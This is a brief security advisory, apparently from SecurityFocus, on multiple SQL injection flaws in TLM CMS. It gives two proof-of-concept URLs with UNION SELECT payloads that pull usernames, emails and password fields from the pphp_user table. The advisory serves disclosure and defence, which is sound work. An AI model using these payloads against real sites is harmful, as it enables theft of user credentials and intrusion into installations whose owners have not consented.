TLM CMS Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/timcms31/a-b-membres.php?action=Perso&nom=1'/**/union/**/select/**/0,1,2,3,4,5,6,US_uid,8,9,US_mail,11,12,13,14,15,US_pseudo,US_pwd,18,19,20,21,22,23/**/from/**/pphp_user/*
http://www.example.com/tmcms31/goodies.php?act=lire&idnews=-1/**/union/**/select/**/0,1,2,US_pwd,US_pseudo,5,6,7,US_mail,9,10/**/from/**/pphp_user/*


 

Privacy Statement
Copyright 2010, SecurityFocus